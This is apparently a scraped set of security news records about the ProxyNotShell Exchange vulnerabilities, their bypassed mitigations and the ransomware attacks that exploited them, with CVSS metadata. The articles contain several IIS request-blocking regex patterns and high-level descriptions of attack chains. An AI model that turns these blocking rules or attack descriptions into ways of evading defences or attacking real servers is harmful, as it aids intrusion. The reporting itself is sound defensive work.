Weeks of Monitoring ProxyNotShell (CVE-2022-41040 & CVE-2022-41082) Threat Activity](<https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/>) appeared first on [Wordfence](<https://www.wordfence.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T16:01:59", "type": "wordfence", "title": "Two Weeks of 
Monitoring ProxyNotShell (CVE-2022-41040 & CVE-2022-41082) Threat Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-19T16:01:59", "id": "WORDFENCE:035A383C0D3B38D6EEBF9FE95D1A356D", "href": "https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-10-01T06:04:28", "description": "Microsoft officially disclosed it is investigating two zero-day security vulnerabilities impacting Exchange Server 2013, 2016, and 2019 following [reports of in-the-wild exploitation](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>).\n\n\"The first vulnerability, identified as [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), is a Server-Side Request Forgery ([SSRF](<https://en.wikipedia.org/wiki/Server-side_request_forgery>)) vulnerability, while the second, identified as [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>), allows remote code execution (RCE) when PowerShell is accessible to the attacker,\" the tech giant [said](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>).\n\nThe company also confirmed that it's aware of \"limited targeted attacks\" weaponizing the flaws to obtain initial access to targeted systems, but emphasized that authenticated access to the vulnerable Exchange Server is required to achieve successful exploitation.\n\nThe attacks detailed by Microsoft show that the two flaws are strung together in an exploit chain, 
with the SSRF bug enabling an authenticated adversary to remotely trigger arbitrary code execution.\n\nThe Redmond-based company further emphasized that it's working on an \"accelerated timeline\" to push a fix, while urging on-premises Microsoft Exchange customers to add a blocking rule in IIS Manager as a temporary workaround to mitigate potential threats.\n\nIt's worth noting that Microsoft Exchange Online customers are not affected. The steps to add the blocking rule are as follows -\n\n 1. Open the IIS Manager\n 2. Expand the Default Web Site\n 3. Select Autodiscover\n 4. In the Feature View, click URL Rewrite\n 5. In the Actions pane on the right-hand side, click Add Rules\n 6. Select Request Blocking and click OK\n 7. Add String \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes) and click OK\n 8. Expand the rule and select the rule with the Pattern \".*autodiscover\\\\.json.*\\@.*Powershell.*\" and click Edit under Conditions\n 9. Change the condition input from {URL} to {REQUEST_URI}\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-09-30T09:01:00", "type": "thn", "title": "Microsoft Confirms 2 New Exchange Zero-Day Flaws Being Used in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T05:48:11", "id": "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "href": "https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T06:04:52", "description": "Microsoft has revised its mitigation measures for the newly disclosed and actively exploited zero-day flaws in Exchange Server after it was found that they could be trivially bypassed.\n\nThe two vulnerabilities, tracked as CVE-2022-41040 and CVE-2022-41082, have been codenamed [ProxyNotShell](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) due to similarities to another set of flaws called [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), which the tech giant resolved last year.\n\nIn-the-wild attacks abusing the [shortcomings](<https://kb.cert.org/vuls/id/915563>) have chained the two flaws to gain remote code execution on compromised servers with elevated privileges, leading to the deployment of web shells.\n\nThe Windows maker, which is yet to release a fix for the bugs, has acknowledged that a single state-sponsored threat actor may have been weaponizing the flaws since August 2022 in limited targeted 
attacks.\n\nIn the meantime, the company has made available temporary workarounds to reduce the risk of exploitation by restricting known attack patterns through a rule in the IIS Manager.\n\nHowever, according to security researcher Jang ([@testanull](<https://twitter.com/testanull/status/1576774007826718720>)), the URL pattern can be easily circumvented, with senior vulnerability analyst Will Dormann [noting](<https://twitter.com/wdormann/status/1576922677675102208>) that the block mitigations are \"unnecessarily precise, and therefore insufficient.\"\n\nMicrosoft has since [revised](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) the URL Rewrite rule (also available as a standalone [PowerShell script](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)) to take this into account -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026\n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: .*autodiscover\\\\.json.*Powershell.* and click Edit under Conditions\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nIt's not immediately clear when Microsoft plans to push a patch for the two vulnerabilities, but it's possible that they could be shipped as part of Patch Tuesday updates next week on October 11, 2022.\n
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T05:31:00", "type": "thn", "title": "Mitigation for Exchange Zero-Days Bypassed! Microsoft Issues New Workarounds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T04:57:27", "id": "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "href": "https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-10T04:05:08", "description": "Microsoft on Friday [disclosed](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it has made more improvements to the [mitigation method](<https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html>) offered as a means to prevent exploitation attempts against the newly disclosed unpatched security flaws in Exchange Server.\n\nTo that end, the tech giant has revised the blocking rule in IIS Manager from \".*autodiscover\\\\.json.*Powershell.*\" to 
\"(?=.*autodiscover\\\\.json)(?=.*powershell).\"\n\nThe list of updated steps to add the URL Rewrite rule is below -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \"(?=.*autodiscover\\\\.json)(?=.*powershell)\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: (?=.*autodiscover\\\\.json)(?=.*powershell) and click Edit under Conditions\n * Change the Condition input from {URL} to {UrlDecode:{REQUEST_URI}} and then click OK\n\nAlternatively, users can achieve the desired protections by executing a PowerShell-based Exchange On-premises Mitigation Tool ([EOMTv2.ps1](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)), which has also been updated to take into account the aforementioned URL pattern.\n\nThe [actively-exploited issues](<https://viz.greynoise.io/tag/exchange-proxynotshell-vuln-check?days=30>), called ProxyNotShell (CVE-2022-41040 and CVE-2022-41082), are yet to be addressed by Microsoft, although with Patch Tuesday right around the corner, the wait may not be for long.\n\nSuccessful weaponization of the flaws could enable an authenticated attacker to chain the two vulnerabilities to achieve remote code execution on the underlying server.\n\nThe tech giant, last week, [acknowledged](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) that the shortcomings may have been abused by a single state-sponsored threat actor since August 2022 in limited targeted attacks aimed at less than 10 organizations worldwide.\n\n**_Update:_** Microsoft, over the weekend, said that it has once again made a correction to the URL string \u2013 \"(?=.*autodiscover)(?=.*powershell)\" \u2013 to be added to the blocking rule in IIS Manager to 
prevent exploitation attempts.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T05:13:00", "type": "thn", "title": "Microsoft Issues Improved Mitigations for Unpatched Exchange Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-10T03:51:40", "id": "THN:8200D2C2E1DD329D680C5E699177551B", "href": "https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T16:20:52", "description": "Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the [two newly disclosed zero-day flaws](<https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html>) in a limited set of attacks aimed at less than 10 organizations globally.\n\n\"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data 
exfiltration,\" the Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) in a new analysis.\n\nThe weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the \"highly privileged access Exchange systems confer onto an attacker.\"\n\nThe tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative disclosed the flaws to Microsoft Security Response Center (MSRC) earlier last month on September 8-9, 2022.\n\nThe two vulnerabilities have been collectively dubbed [**ProxyNotShell**](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>), owing to the fact that \"it is the same path and SSRF/RCE pair\" as [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) but with authentication, suggesting an incomplete patch.\n\nThe issues, which are strung together to achieve remote code execution, are listed below -\n\n * [**CVE-2022-41040**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability\n * [**CVE-2022-41082**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) (CVSS score: 8.8) - Microsoft Exchange Server Remote Code Execution Vulnerability\n\n\"While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user,\" Microsoft said. 
\"Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDHuP8RcawOweo1l6ugi9Ob9HAQv5FloiZoBENRZJT1OGy1-icUmXQvdS86HsNfrxOCd9PP7M0XaqOZf1bLcVGic0MzVny5fGJtRDkn9gJzNIkyRzbf0NI5KIZSFcJkY_K7_R4TE6PtOAWo3h_NhgHlKy4YxwtTGQVxWAPzI6FaEI3z9CMmjvAJYMUZA/s728-e100/ms.jpg>)\n\nThe vulnerabilities were [first discovered](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>) by Vietnamese cybersecurity company GTSC as part of its incident response efforts for an unnamed customer in August 2022. A Chinese threat actor is suspected to be behind the intrusions.\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog>) the two Microsoft Exchange Server zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by October 21, 2022.\n\nMicrosoft said that it's working on an \"accelerated timeline\" to release a fix for the shortcomings. 
It has also [published a script](<https://aka.ms/EOMTv2>) for the following URL Rewrite mitigation steps that it said is \"successful in breaking current attack chains\" -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern .*autodiscover\\\\.json.*\\@.*Powershell.* and click Edit under Conditions.\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nAs additional prevention measures, the company is urging organizations to enforce multi-factor authentication (MFA), disable [legacy authentication](<https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication#moving-away-from-legacy-authentication>), and educate users about [not accepting](<https://thehackernews.com/2022/09/uber-claims-no-sensitive-data-exposed.html>) unexpected two-factor authentication (2FA) prompts.\n\n\"Microsoft Exchange is a juicy target for threat actors to exploit for two primary reasons,\" Travis Smith, vice president of malware threat research at Qualys, told The Hacker News.\n\n\"First, Exchange [...] being directly connected to the internet creates an attack surface which is accessible from anywhere in the world, drastically increasing its risk of being attacked. Secondly, Exchange is a mission critical function -- organizations can't just unplug or turn off email without severely impacting their business in a negative way.\"\n
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T06:36:00", "type": "thn", "title": "State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T12:45:52", "id": "THN:A5B36072ED31304F26AF0879E3E5710E", "href": "https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T12:04:40", "description": "Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082, that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverages a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to 
permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying Exchange server by leveraging existing Exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access CVE-2022-41040, which should limit attackers' access to the vulnerability, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization, which granted attackers access to some of its clients. 
Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained vulnerabilities could grant an outside attacker the ability to read emails directly off an organization's server, to breach the organization with CVE-2022-41040 Remote Code Execution, and to implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical assets is also an option, though only practicable if such a measure does not impact vital operations, and it should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to 
ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enables organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenario templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof \u2013 to ProxyNotShell.\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell is the most cost-efficient way to determine exactly which servers and assets are exposed and to devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-22T04:09:51", "description": "Threat actors affiliated with a ransomware 
strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution (RCE) through Outlook Web Access ([OWA](<https://en.wikipedia.org/wiki/Outlook_on_the_web>)).\n\n\"The new exploit method bypasses [URL rewrite mitigations](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) for the [Autodiscover endpoint](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover>),\" CrowdStrike researchers Brian Pitchford, Erik Iker, and Nicolas Zilio [said](<https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/>) in a technical write-up published Tuesday.\n\nPlay ransomware, which first surfaced in June 2022, has been [revealed](<https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html>) to adopt many tactics employed by other ransomware families such as [Hive](<https://thehackernews.com/2022/11/hive-ransomware-attackers-extorted-100.html>) and [Nokoyawa](<https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html>), the latter of which [upgraded to Rust](<https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust>) in September 2022.\n\nThe cybersecurity company's investigations into several Play ransomware intrusions found that initial access to the target environments was not achieved by directly exploiting [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), but rather through the OWA endpoint.\n\nDubbed **OWASSRF**, the technique likely takes advantage of another critical flaw tracked as [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>) (CVSS score: 8.8) to achieve privilege escalation, followed by abusing 
[CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) for remote code execution.\n\nIt's worth noting that both CVE-2022-41040 and CVE-2022-41080 stem from a case of server-side request forgery ([SSRF](<https://owasp.org/www-community/attacks/Server_Side_Request_Forgery>)), which permits an attacker to access unauthorized internal resources, in this case the [PowerShell remoting](<https://learn.microsoft.com/en-us/powershell/exchange/exchange-management-shell>) service.\n\nCrowdStrike said the successful initial access enabled the adversary to drop legitimate Plink and AnyDesk executables to maintain persistent access as well as take steps to purge Windows Event Logs on infected servers to conceal the malicious activity.\n\nAll three vulnerabilities were addressed by Microsoft as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/11/install-latest-windows-update-asap.html>) for November 2022. 
It is unclear, however, whether CVE-2022-41080 was actively exploited as a zero-day alongside CVE-2022-41040 and CVE-2022-41082.\n\nThe Windows maker, for its part, has tagged CVE-2022-41080 with an \"Exploitation More Likely\" assessment, implying it's possible for an attacker to create exploit code that could be utilized to reliably weaponize the flaw.\n\nCrowdStrike further noted that a proof-of-concept (PoC) Python script [discovered](<https://twitter.com/Purp1eW0lf/status/1602989967776808961>) and leaked by Huntress Labs researcher Dray Agha last week may have been put to use by the Play ransomware actors for initial access.\n\nThis is evidenced by the fact that the execution of the Python script made it possible to \"replicate the logs generated in recent Play ransomware attacks.\"\n\n\"Organizations should apply the November 8, 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method,\" the researchers said.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T07:41:00", "type": "thn", "title": "Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2022-12-22T03:36:49", "id": "THN:DF2B360775F2B7F0C76A360FDA254FBA", "href": "https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-07T18:11:10", "description": "Cloud services provider Rackspace on Thursday confirmed that the ransomware gang known as **Play** was responsible for last month's breach.\n\nThe security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.\n\n\"This zero-day exploit is associated with [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>),\" the Texas-based company [said](<https://status.apps.rackspace.com/index/viewincidents?group=2>). 
\"Microsoft disclosed CVE-2022-41080 as a privilege escalation vulnerability and did not include notes for [it] being part of a remote code execution chain that was exploitable.\"\n\nRackspace's forensic investigation found that the threat actor accessed the Personal Storage Table ([.PST](<https://en.wikipedia.org/wiki/Personal_Storage_Table>)) of 27 customers out of a total of nearly 30,000 customers on the Hosted Exchange email environment.\n\nHowever, the company said there is no evidence the adversary viewed, misused, or distributed the customers' emails or data from those personal storage folders. It further said it intends to retire its Hosted Exchange platform as part of a planned migration to Microsoft 365.\n\nIt's not currently known if Rackspace paid a ransom to the cybercriminals, but the disclosure follows a report from CrowdStrike last month that shed light on the new technique, dubbed [OWASSRF](<https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html>), employed by the Play ransomware actors.\n\nThe mechanism targets Exchange servers that are unpatched against the ProxyNotShell vulnerabilities ([CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>)) but have in place URL rewrite mitigations for the Autodiscover endpoint.\n\nThis involves an exploit chain comprising CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution in a manner that bypasses the blocking rules through Outlook Web Access (OWA). 
The flaws were addressed by Microsoft in November 2022.\n\nThe Windows maker, in a statement shared with The Hacker News, urged customers to prioritize installing its [November 2022 Exchange Server updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045>) and noted that the reported method targets vulnerable systems that have not applied the latest fixes.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-06T09:01:00", "type": "thn", "title": "Rackspace Confirms Play Ransomware Gang Responsible for Recent Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-01-07T17:47:30", "id": "THN:A356406D6A8ADF4F4592DBAAEB6CDA74", "href": "https://thehackernews.com/2023/01/rackspace-confirms-play-ransomware-gang.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-09T12:39:27", "description": "A recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the 
Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher Nadav Ovadia [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold in their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of 
characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n
